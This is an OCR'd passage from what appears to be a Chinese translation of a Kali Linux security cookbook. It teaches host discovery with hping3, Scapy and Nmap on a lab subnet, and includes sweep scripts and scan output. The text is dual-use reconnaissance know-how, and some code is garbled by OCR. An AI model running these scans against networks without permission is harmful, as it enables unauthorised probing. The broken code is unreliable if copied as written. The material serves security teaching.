目录 中 删除 handle.txt 临时 文件 。 此 脚本 可 以 使 用 句号 和 斜 杠 ， 后 跟 可 执行 脚 
本 的 名 称 执行 : 


root@KaliLinux:~# ./ping sweep.sh 
Usage - ./ping sweep.sh [/24 network address] 
Example - ./ping sweep.sh 172.16.36.0 
Example will perform an ICMP ping sweep of the 172.16.36.0/24 ne 
twork and output to an output.txt file 
root@KaliLinux:~# ./ping sweep.sh 172.16.36.0 
--- 172.16.36.1 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.4/0.4/0.4 ms 
--- 172.16.36.2 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.5/0.5/0.5 ms 
--- 172.16.36.3 hping statistic -- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 
*w* {TRUNCATED} *** 


一 旦 完成 ， 脚 本 应 该 返回 一 个 output.txt 文件 到 执行 目录 。 这 可 以 使 用 ls 验 
证 ， 并 且 cat 命令 可 以 用 于 查看 此 文件 的 内 容 : 


root@KaliLinux:~# ls output.txt 
output.txt 

root@KaliLinux:~# cat output.txt 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.253 


当 脚 本 运行 时 ， 你 仍然 会 看 到 在 初始 循环 任务 时 看 到 的 大 量 输出 。 幸运 的 是 ， 你 发 
现 的 主机 列表 不 会 在 此 输出 中 消失 ， 因 为 它 每 次 都 会 写 入 你 的 输出 文件 。 


工作 原理 


我 们 需要 进行 一 些 调整 ， 才 能 使 用 hping3 对 多 个 主机 或 地 址 范围 执行 主机 发 现 。 
提供 的 秘籍 使 用 bash 脚本 顺序 执行 ICMP 回应 请 求 。 这 是 可 性 的 ， 因 为 成 功 和 不 
成 功 的 请 求 能 够 生成 唯一 响应 。 通 过 将 函数 传递 给 一 个 循环 ， 并 将 唯一 响应 传递 
给 grep ， 我 们 可 以 高 效 开 发 出 一 个 脚本 ， 对 多 个 系统 依次 执行 ICMP 发 现 ， 然 后 
输出 活动 主机 列表 。 


2.11 使 用 Scapy 探索 第 四 层 


多 种 不 同方 式 可 以 用 于 在 第 四 层 执行 目标 发 现 。 可 以 使 用 用 户 数据 报 协 议 (UDP) 
或 传输 控制 协议 (TCP) 来 执行 扫描 。 Scapy 可 以 用 于 使 用 这 两 种 传输 协议 来 制作 
自 定 义 请 求 ， 并 且 可 以 与 Python 脚本 结合 使 用 以 开发 实用 的 发 现 工 具 。 此 秘籍 演 
示 了 如 何 使 用 Scapy 执行 TCP 和 UDP 的 第 四 层 发 现 。 


准备 


使 用 Scapy 执行 第 四 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回复 
TCP 和 UDP 请求。 但是， 强烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 
络 扫描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 
环境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 TCP/UDP 请 求 的 系统 。 在 提供 的 示例 
中 ， 使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 

信息 ， 请 参阅 第 一 章 中 的 “安装 Metasploitable2”" 和 “安装 Windows Server" 秘籍。 此 
外 ， 本 节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 
写 脚本 的 更 多 信息 ， 请 参阅 第 一 章 中 的 "使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


为 了 验证 从 活动 主机 接收 到 的 RST 响应 ， 我 们 可 以 使 用 Scapy 向 已 知 的 活动 主机 
发 送 TCP ACK 数据 包 。 在 提供 的 示例 中 ，ACK 数据 包 将 发 送 到 TCP 目标 端口 
80。 此 端口 通常 用 于 运行 HTTP Web 服务 。 演示 中 使 用 的 主机 当前 拥有 在 此 端口 
上 运行 的 Apache 服务 。 为 此 ， 我 们 需要 构建 我 们 的 请 求 的 每 个 层级 。 要 构建 的 
第 一 层 是 |P 层 。 看 看 下 面 的 命令 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
src- 127.0.0.1 
dst- 127.0.0.1 
\options\ 
>>> 1.dst="172.16.36.135" 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= ip 
chksum= None 
Src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 


这 里 ， 我 们 将 i 变量 初始 化 为 IP 对 象 ， 然 后 重新 配置 标准 配置 ， 将 目标 地 址 设 
置 为 目标 服务 器 的 IP 地址。 请 注意 ， 当 为 目标 地 址 提供 除 回 送 地 址 之 外 的 任何 IP 
地 址 时 ， 源 IP 地址 会 自动 更 新 。 我 们 需要 构建 的 下 一 层 是 我 们 的 TCP 层 。 这 可 
以 在 以 下 命令 中 看 到 : 


>>> t = TCP() 
>>> t.display() 
###[ TCP ]### 
sport= ftp_data 
dport= http 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= S 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 
>>> t.flags='A' 
>>> t.display() 
###[ TCP ]### 
sport= ftp_data 
dport= http 
seq= 0 
ack= 0 
dataofs= None 
reserved= 0 
flags= A 
window= 8192 
chksum= None 
urgptr= 0 
options= {} 


KERN t 变量 初始 化 为 TCP 对 象 。 ZB GARU LAA A tram 
口 设 置 为 HTTP 或 端口 80。 这 里 ， 我 们 只 需要 将 TCP 标志 从 S (SYN) BK 
为 A (ACK) 。 现 在 ， 可 以 通过 使 用 斜 杠 分 隔 每 个 层级 来 构建 栈 ， 如 以 下 命令 中 
所 示 : 


>>> request = (i/t) 

>>> request.display() 

HH#[ IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= tcp 


chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 
###[ TCP ]### 
sport= ftp_data 


dport= http 
seq- 0 
ack- 0 


dataofs- None 
reserved- 0 
flags- A 
window- 8192 
chksum- None 
urgptr- 0 
options- {} 


这 里 ， 我 们 将 整个 请 求 栈 赋 给 request 变量 。 现在， 可 以 使 
用 send 和 recieve 函数 跨 线 路 发 送 请 求 ， 然 后 可 以 评估 响应 来 确定 目标 地 址 的 
AA: 


>>> response = sri(request) 
Begin emission: 
ME Finished to send 1 packets. 


Received 12 packets, got 1 answers, remaining O packets 
>>> response.display() 
###[ IP ]### 
version- 4L 
ihl- 5L 
tos- 0x0 
len- 40 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 
chksum= 0x9974 
src- 172.16.36.135 
dst- 172.16.36.180 
NoptionsN 
###[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 0 
ack= 0 
dataofs= 5L 
reserved= OL 
flags= R 
window= 0 
chksum- 0xe21 
urgptr- 0 
options- {} 
###[ Padding ]### 
load= '\x00\x00\x0O0\x00\x00\x00' 


请 注意 ， 远 程 系统 使 用 设置 了 RST 标志 的 TCP 数据 包 进 行 响应 。 这 由 分 配 
给 flags 属性 的 R 值 表示 。 通过 直接 调用 函数 ， 可 以 将 堆 屋 请 求 和 发 送 和 接收 
响应 的 整个 过 程 压缩 为 单个 命令 : 


>>> response = sri(IP(dstz"172.16.36.135")/TCP(flags-'A')) 
.Begin emission: 


Finished to send 1 packets. 
* 
Received 22 packets, got 1 answers, remaining 0 packets 
>>> response.display() 
###[ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 40 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 
chksum- 0x9974 
src= 172.16.36.135 
dst- 172.16.36.180 
NoptionsN 
###[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 0 
ack= 0 
dataofs= 5L 
reserved= OL 
flags= R 
window= 0 
chksum- 0xe21 
urgptr- 0 
options- {} 
###[ Padding ]### 
load- '\x00\x00\x00\x00\x00\x00' 


现在 我 们 已 经 确定 了 与 发 送 到 活动 主机 上 的 打开 端口 的 ACK 数据 包 相 关联 的 响 
应 ， 让 我 们 尝试 向 活动 系统 上 的 已 关闭 端口 发 送 类 似 的 请 求 ， 并 确定 响应 是 否 有 任 
何 变化 : 


>>> response = sri(IP(dst="172.16.36.135")/TCP(dport=1111, flags= 
'A'! )) 
.Begin emission: 


Finished to send 1 packets. 
* 
Received 15 packets, got 1 answers, remaining 0 packets 
>>> response.display() 
###[ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 40 
id= 0 
flags= DF 
frag- OL 
ttl= 64 
proto= tcp 
chksum= 0x9974 
src= 172.16.36.135 
dst= 172.16.36.180 
\options\ 
#HH[ TCP ]### 
sport- 1111 
dport- ftp data 
seq- 0 
ack- 0 
dataofs- 5L 
reserved- OL 
flags- R 
window- 0 
chksum- Oxaia 
urgptr- 0 
options- {} 
###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 


在 此 请 求 中 ， 目 标 TCP 端口 已 从 默认 端口 80 更 改 为 端口 1111 (未 在 其 上 运行 服 
务 的 端口 ) 。 请 注意 ， 从 活动 系统 上 的 打开 端口 和 关闭 端口 返回 的 响应 是 相同 的 。 
无 论 这 是 否 是 在 扫描 端口 上 主动 运行 的 服务 ， 活 动 系统 都 会 返回 RST 响应 。 A 
外 ， 应 当 注 意 ， 如 果 将 类 似 的 扫描 发 送 到 与 活动 系统 无 关 的 |IP 地 址 ， 则 不 会 返回 
响应 。 这 可 以 通过 将 请 求 中 的 目标 IP 地 址 修改 为 与 实际 系统 无 关 的 IP 地 址 来 验 
hE : 


>>> response = sri(IP(dst="172.16.36.136")/TCP(dport=80, flags='A 
'), timeo ut=1) 
Begin emission: 


Received 3559 packets, got 0 answers, remaining 1 packets 


因此 ， 通 过 查看 ， 我 们 发 现 对 于 发 送 到 活动 主机 任何 端口 的 ACK 数据 包 ， 无 论 端 
口 状态 如 何 ， 都 将 返回 RST 数据 包 ， 但 如 果 没 有 活动 主机 与 之 相关 ， 则 不 会 从 IP 
接收 到 响应 。 这 是 一 个 好 消息 ， 因 为 它 意 味 着 ， 我 们 可 以 通过 只 与 每 个 系统 上 的 单 
个 端口 进行 交互 ， 在 大 量 系 统 上 执行 发 现 扫描 。 将 Scapy 与 Pylon 结合 使 用 ， 我 
们 可 以 快速 循环 访问 / 24 网 络 范 pum 并 向 每 个 系统 上 的 仅 一 个 
TCP 端口 发 送 单个 ACK 数据 包 。 通过 评估 每 个 主机 返回 的 响应 ， 我 们 可 以 轻易 输 
出 活动 IP 地 址 列表 。 


#!/usr/bin/python 


import logging 
logging. getLogger("Sscapy. runtime") .setLevel(logging.ERROR) 
from scapy.all import * 


if len(sys.argv) != 2: 

print "Usage - ./ACK Ping.py [/24 network address ]" 

print "Example - ./ACK Ping.py 172.16.36.0" 

print "Example will perform a TCP ACK ping scan of the 172.1 
6.36.0/24 range" 

sys.exit() 


address = str(sys.argv[1]) 
prefix = address.split('.')[0] + '.' + address.split('.')[1] + ' 
+ address. split(?.. ) [2+ 5. 


for addr in range(1, 254): 
response = sri(IP(dst=prefix+str (addr) )/TCP(dport=80, flags=' 
A'), timeout=1, verbose=0 ) 
Ery: 
if int(response[TCP].flags) == 4: 
print "172.16.36."+str(addr) 
except: 
pass 


提供 的 示例 脚本 相当 简单 。 当 循 环 遍历 IP 地 址 中 的 最 后 一 个 入 位 字 节 的 每 个 可 能 
值 时 ，ACK 封包 被 发 送 到 i 端口 80， 并 且 评 估 响 应 来 确定 响应 中 的 TCP 标志 
的 整数 转换 是 否 具有 值 4 (与 单独 RST 标志 相关 的 值 ) 。 如 果 数 据 包 具有 RST 
标志 ， 则 脚本 将 输出 返回 响应 的 系统 的 IP 地 址 。 如 果 没 有 收 到 响应 ，Python 无 法 


测试 响应 变量 的 值 ， 因 为 没有 为 其 赋 任 何 值 。 因 此 ， 如 果 没 有 返回 响应 ， 将 发 生 弄 
常 。 如 果 返 回 弄 常 ， 脚 本 将 会 跳 过 。 生成 的 输出 是 活动 目标 IP 地 址 的 列表 。 此 脚 
本 可 以 使 用 名 号 和 斜 枉 ， 后 跟 可 执行 脚本 的 名 称 执行 : 


root@KaliLinux:~# ./ACK Ping.py 

Usage - ./ACK Ping.py [/24 network address] 

Example - ./ACK Ping.py 172.16.36.0 

Example will perform a TCP ACK ping scan of the 172.16.36.0/24 r 
ange 

root@KaliLinux:~# ./ACK Ping.py 

172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


类 似 的 发 现 方法 可 以 用 于 使 用 UDP 协议 来 执行 第 四 层 发 现 。 为 了 确定 我 们 是 否 可 
以 使 用 UDP 协议 发 现 主机 ， 我 们 需要 确定 如 何 从 任何 运行 UDP 的 活动 主机 触发 响 
应 ， 而 不 管 系统 是 否 有 在 UDP 端口 上 运行 服务 。 为 了 尝试 这 个 ， 我 们 将 首先 在 
Scapy 中 构建 我 们 的 请 求 栈 : 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.dst = "172.16.36.135" 
>>> u = UDP() 
>>> request = (i/u) 
>>> request.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= udp 
chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 
###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 


注意 ，UDP 对 象 的 默认 源 和 目标 端口 是 域名 系统 (DNS) 。 这 是 一 种 常用 的 服 
务 ， 可 用 于 将 域名 解析 为 IP 地 址 。 发送 请 求 是 因为 它 是 有 助 于 判断 ，IP 地 址 是 否 
与 活动 主机 相关 联 。 发 送 此 请 求 的 示例 可 以 在 以 下 命令 中 看 到 : 


>>> reply = sri(request, timeout=1, verbose=1) 

Begin emission: 

Finished to send 1 packets. 

Received 7 packets, got 0 answers, remaining 1 packets 


尽管 与 目标 IP 地 址 相关 的 主机 是 活动 的 ， 但 我 们 没有 收 到 响应 。 讽 刺 的 是 ， 缺 乏 
响应 实际 上 是 由 于 DNS 服务 正在 目标 系统 上 使 用 。 这 是 因为 活动 服务 通常 配置 为 
仅 响应 包含 特定 内 容 的 请 求 。 你 可 能 会 自然 想到 ， 有 时 可 以 尝试 通过 探测 未 运行 服 
务 的 UDP 端口 来 高 效 识别 主机 ， 假 设 ICMP 流量 未 被 防火 墙 阻 止 。 现 在 ， 我 们 党 
试 将 同一 请 求 发 送 到 不 在 使 用 的 不 同 UDP 端口 : 


>>> u.dport = 123 
>>> request = (i/u) 
>>> reply = sri(request, timeout=1, verbose=1) 
Begin emission: Finished to send 1 packets. 
Received 5 packets, got 1 answers, remaining 0 packets 
>>> reply.display() 
HHH [ IP ]### 
version= 4L 
ihl- 5L 
tos= OxcO 
len- 56 
id- 62614 
flags- 
frag- OL 
ttl- 64 
proto- icmp 
chksum- 0xe412 
src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 
###[ ICMP ]### 
type= dest-unreach 
code= port-unreachable 
chksum= 0x9e72 
unused= 0 
###[ IP in ICMP ]### 
version= 4L 


ihl- 5L 
tos= 0x0 
len= 28 
id= 1 
flags= 
frag- OL 
ttl= 64 
proto= udp 


chksum= 0xd974 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 

###[ UDP in ICMP ]### 
sport= domain 
dport= ntp 
len= 8 
chksum- 0x5dd2 


通过 将 请 求 目标 更 改 为 端口 123， 然 后 重新 发 送 它 ， 我 们 现在 会 收 到 一 个 响应 ， 表 
明 目 标 端口 不 可 达 。 如 果 检 查 此 响应 的 源 IP 地 址 ， 你 可 以 看 到 它 是 从 发 送 原 始 请 
求 的 主机 发 送 的 。 此 响应 随后 表明 原始 目标 IP 地 址 处 的 主机 处 于 活动 状态 。 不 幸 
的 是 ， 在 这 些 情况 下 并 不 总 是 返回 响应 。 这 种 技术 的 效率 在 很 大 程度 上 取决 于 你 正 
在 探测 的 系统 及 其 配置 。 正 因为 如 此 ，UDP 发 现 通常 比 TCP 发 现 更 难 执 行 。 它 从 
来 不 会 像 发 送 带 有 单个 标志 的 TCP 数据 包 那 么 简单 。 在 服务 确实 存在 的 情况 下 ， 
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用 各 种 UDP 请 求 和 服务 特定 的 探 针 ， 来 确定 活动 主机 是 否 关联 了 任何 给 定 的 IP 地 
址 。 


工作 原理 


这 里 提供 的 示例 使 用 UDP 和 TCP 发 现 方式 。 我们 能 够 使 用 Scapy 来 制作 自 定 义 
请 求 ， 来 使 用 这 些 协议 识别 活动 主机 。 在 TCP 的 情况 下 ， 我 们 构造 了 自 定义 的 
ACK 封包 并 将 其 发 送 到 每 个 目标 系统 上 的 任意 端口 。 在 接收 到 RST 应 答 的 情况 
下 ， 系 统 被 识别 为 活动 的 。 或 者 ， 空 的 UDP 请 求 被 发 送 到 任意 端口 ， 来 尝试 请 求 
ICMP 端口 不 可 达 响 应 。 响应 可 用 作 活 动 系统 的 标识 。 然后 这 些 技术 中 的 每 一 个 都 
可 以 在 Python 脚本 中 使 用 ， 来 对 多 个 主机 或 地 址 范围 执行 发 现 。 


2.12 使 用 Nmap 探索 第 四 层 


除了 集成 到 Nmap 工具 中 的 许多 其 他 扫描 功能 ， 还 有 一 个 选项 用 于 执行 第 四 层 发 
现 。 这 个 具体 的 秘籍 演示 了 如 何 使 用 Nmap 执行 TCP 和 UDP 协议 的 第 4 层 发 现 。 


准备 


使 用 Nmap 执行 第 四 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回复 
TCP 和 UDP 请 求 。 但 是 ， 强 烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 
络 扫描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 
环境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 TCP/UDP 请 求 的 系统 。 在 提供 的 示例 
中 ， 使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 

信息 ， 请 参阅 第 一 章 中 的 “安装 Metasploitable2”" 和 “安装 Windows Server" 秘籍 。 此 
外 ， 本 节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 
写 脚本 的 更 多 信息 ， 请 参阅 第 一 章 中 的 "使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


在 Nmap 中 有 一 些 选项 用 于 发 现 运行 TCP 和 UDP 的 主机 。 Nmap 的 UDP 发 现 已 
配置 为 ， 使 用 必需 的 唯一 载荷 来 触发 无 响应 的 服务 。 为 了 使 用 UDP 执行 发 现 扫 
描 ， 请 使 用 -PU 选项 和 端口 来 测试 : 


root@KaliLinux:~# nmap 172.16.36.135 -PU53 -Sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-11 20:11 EST 
Nmap scan report for 172.16.36.135 Host is up (0.00042s latency) 


MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds 

This UDP discovery scan can also be modified to perform a scan o 
f a sequential range by using dash notation. In the example prov 
ided, we will scan the entire 172.16.36.0/24 address range: 
root@KaliLinux:~# nmap 172.16.36.0-255 -PU53 -sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 06:33 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00020s latency). 

MAC Address: 00:50:56:C0:00:08 (VMware) 

Nmap scan report for 172.16.36.2 

Host is up (0.00018s latency). 

MAC Address: 00:50:56:FF:2A:8E (VMware) 

Nmap scan report for 172.16.36.132 

Host is up (0.00037s latency). 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 

Nmap scan report for 172.16.36.135 

Host is up (0.00041s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap scan report for 172.16.36.180 

Host is up. 

Nmap scan report for 172.16.36.254 

Host is up (0.00015s latency). 

MAC Address: 00:50:56:EB:E1:8A (VMware) 

Nmap done: 256 IP addresses (6 hosts up) scanned in 3.91 seconds 


与 之 类 似 ， 也 可 以 对 输入 列表 所 定义 的 一 系列 IP 地 址 执行 Nmap UDP ping 请 求 。 
在 提供 的 示例 中 ， 我 们 使 用 同一 目录 中 的 iplist.txt 文件 来 扫描 以 下 列 出 的 每 
个 主机 : 


root@KaliLinux:~# nmap -iL iplist.txt -sn -PU53 

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 06:36 EST 
Nmap scan report for 172.16.36.2 

Host is up (0.00015s latency). 

MAC Address: 00:50:56:FF:2A:8E (VMware) 

Nmap scan report for 172.16.36.1 

Host is up (0.00024s latency). 

MAC Address: 00:50:56:C0:00:08 (VMware) 

Nmap scan report for 172.16.36.135 

Host is up (0.00029s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap scan report for 172.16.36.132 

Host is up (0.00030s latency). 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 

Nmap scan report for 172.16.36.180 

Host is up. 

Nmap scan report for 172.16.36.254 

Host is up (0.00021s latency). 

MAC Address: 00:50:56:EB:E1:8A (VMware) 

Nmap done: 6 IP addresses (6 hosts up) scanned in 0.31 seconds 


尽管 来 自 这 些 示 例 中 的 每 一 个 的 输出 表明 发 现 了 六 个 主机 ， 但 是 这 不 一 定 标识 六 个 
主机 都 通过 UDP 发 现 方法 被 发 现 。 除了 在 UDP 端口 53 上 执行 的 探测 之 外 ， 
Nmap 还 将 利用 任何 其 它 发 现 技 术 ， 来 发 现在 指定 范围 内 或 在 输入 列表 内 的 主机 。 
虽然 -sn 选项 有 效 防 止 了 Nmap 执行 TCP 端口 扫描 ， 但 它 不 会 完全 隔离 我 们 的 
UDP ping 请 求 。 虽然 没有 有 效 的 方法 来 隔离 这 个 任务 ， 你 可 以 通过 分 析 
Wireshark 3 TCPdump 中 的 流量 ， 来 确定 通过 UDP 请 求 发 现 的 主机 。 RH? 
Nmap 也 可 以 用 于 以 Scapy 的 相同 方式 ， 来 执行 TCP ACK ping。 为 了 使 用 ACK 
数据 包 识别 活动 主机 ， 请 结合 你 要 使 用 的 端口 使 用 -PA 选项 : 


root@KaliLinux:~# nmap 172.16.36.135 -PA80 -sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-11 20:09 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00057s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds 


TCP ACK ping 发 现 方法 还 可 以 使 用 破 折 号 符号 在 一 定 范围 的 主机 上 执行 ， 或 者 可 
以 基于 输入 列表 在 指定 的 主机 地 址 上 执行 : 


root@KaliLinux:~# nmap 172.16.36.0-255 -PA80 -Sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 06:46 EST 
Nmap scan report for 172.16.36.132 

Host is up (0.00033s latency). 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 

Nmap scan report for 172.16.36.135 

Host is up (0.00013s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 

Nmap scan report for 172.16.36.180 

Host is up. 

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.43 seconds 


root@KaliLinux:~# nmap -iL iplist.txt -PA80 -sn 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 06:47 EST 
Nmap scan report for 172.16.36.135 

Host is up (0.00033s latency). 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap scan report for 172.16.36.132 

Host is up (0.00029s latency). 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 

Nmap scan report for 172.16.36.180 

Host is up. 

Nmap done: 3 IP addresses (3 hosts up) scanned in 0.31 seconds 


工作 原理 


Nmap 用 于 执行 TCP 发 现 的 技术 的 基本 原理 ， 与 Scapy 用 于 执行 TCP 发 现 的 技术 
相同 。Nmap 向 目标 系统 上 的 任意 端口 发 送 一 系列 TCP ACK 数据 包 ， 并 尝试 请 求 
RST 响应 作为 活动 系统 的 标识 。 然而 ，Nmap 用 于 执行 UDP 发 现 的 技术 有 点 不 同 
于 Scapy 的 技术 。 Nmap 不 仅仅 依赖 于 可 能 不 一 致 或 阻塞 的 ICMP 主机 不 可 达 响 
应 ， 而 且 通过 向 目标 端口 发 送 服 务 特定 请 求 ， 党 试 请 求 响应 ， 来 执行 主机 发 现 。 


2.13 使 用 hping3 来 探索 第 四 层 


我 们 之 前 讨论 过 ， 使 用 hping3 来 执行 第 3 层 ICMP 发 现 。 除了 此 功 

能 * hping3 还 可 以 用 于 执行 UDP 和 TCP 主机 发 现 。 然而 ， 如 前 所 

Wo hping3 被 开发 用 于 执行 定向 请 求 ， 并 且 需 要 一 些 脚 本 来 将 其 用 作 有 效 的 扫描 
工具 。 这 个 秘籍 演示 了 如 何 使 用 hping3 来 执行 TCP 和 UDP 协议 的 第 4 层 发 现 。 


准备 


使 用 hping3 执行 第 四 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回 
复 TCP 和 UDP 请求。 但 是 ， 强 烈 建 议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 
网 络 扫 描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实 
验 环境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 TCP/UDP 请 求 的 系统 。 在 提供 的 示 
例 中 ， 使 用 Linux fe Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 
多 信息 ， 请 参阅 第 一 章 中 的 “安装 Metasploitable2”" 和 “安装 Windows Server" 秘 籍 。 
此 外 ， 本 节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 
编写 脚本 的 更 多 信息 ， 请 参阅 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


与 Nmap 不 同 ， hping3 通过 隔离 任务 ， 能 够 轻易 识别 能 够 使 用 UDP 探 针 发 现 的 
主机 。 通过 使 用 --udp 选项 指定 UDP 模式 ， 可 以 传输 UDP 探 针 来 尝试 触发 活动 
主机 的 回复 : 


root@KaliLinux:~# hping3 --udp 172.16.36.132 

HPING 172.16.36.132 (eth1 172.16.36.132): udp mode set, 28 heade 
rs * 0 data bytes 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
S=0 port-2792 seq-0 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s=0 port-2793 seq=1 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s-0 port=2794 seq-2 ^F 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s=0 port-2795 seq=3 

AC 

--- 172.16.36.132 hping statistic -- 

4 packets transmitted, 4 packets received, 0% packet loss 
round-trip min/avg/max = 1.8/29.9/113.4 ms 


在 提供 的 演示 中 ， Ctrl + C 用 于 停止 进程 。 在 UDP 模式 下 使 用 hping3 时 ， 除 
非 在 初始 命令 中 定义 了 特定 数量 的 数据 包 ， 否 则 将 无 限 继续 发 现 。 为 了 定义 要 发 送 
的 尝试 次 数 ， 应 包含 -c 选项 和 一 个 表示 所 需 尝试 次 数 的 整数 值 : 


root@KaliLinux:~# hping3 --udp 172.16.36.132 -c 1 

HPING 172.16.36.132 (eth1 172.16.36.132): udp mode set, 28 heade 
rs + 0 data bytes 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s-0 port-2422 seq-0 


--- 172.16.36.132 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 104.8/104.8/104.8 ms 


虽然 hping3 默认 情况 下 不 支持 扫描 多 个 系统 ， 但 可 以 使 用 bash 脚本 轻易 编写 脚 
本 。 为 了 做 到 这 一 点 ， 我 们 必须 首先 确定 与 活动 地 址 相关 的 输出 ， 以 及 与 非 响 应 地 
址 相关 的 输出 之 间 的 区 别 。 为 此 ， 我 们 应 该 在 未 分 配 主 机 的 IP 地 址 上 使 用 相同 的 
命令 : 


root@KaliLinux:~# hping3 --udp 172.16.36.131 -c 1 

HPING 172.16.36.131 (eth1 172.16.36.131): udp mode set, 28 heade 
rs * 0 data bytes 

--- 172.16.36.131 hping statistic 

--1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


通过 识别 这 些 请求 中 的 每 一 个 的 相关 响应 ， 我 们 可 以 确定 出 我 们 可 以 grep 的 唯一 
字符 串 ; 此 字符 串 能 够 隔离 成 功 的 发 现 尝试 与 失败 的 发 现 尝试 。 在 以 前 的 请 求 中 ， 
你 可 能 已 经 注意 到 ，“ICMP 端口 不 可 达 "的 短语 仅 在 返回 响应 的 情况 下 显示 RF 
此 ， 我 们 可 以 通过 对 Unreachable 进行 grep 来 提取 成 功 的 尝试 。 为 了 确定 此 
方法 在 脚本 中 的 有 效 性 ， 我 们 应 该 尝试 连接 两 个 先前 的 命令 ， 然 后 将 输出 传递 给 我 
们 的 grep 函数 。 假 设 我 们 选择 的 字符 串 对 于 成 功 的 尝试 是 唯一 的 ， 我 们 应 该 只 
看 到 与 活动 主机 相关 的 输出 : 


root@KaliLiniux:~# hping3 --udp 172.16.36.132 -c 1; hping3 --udp 
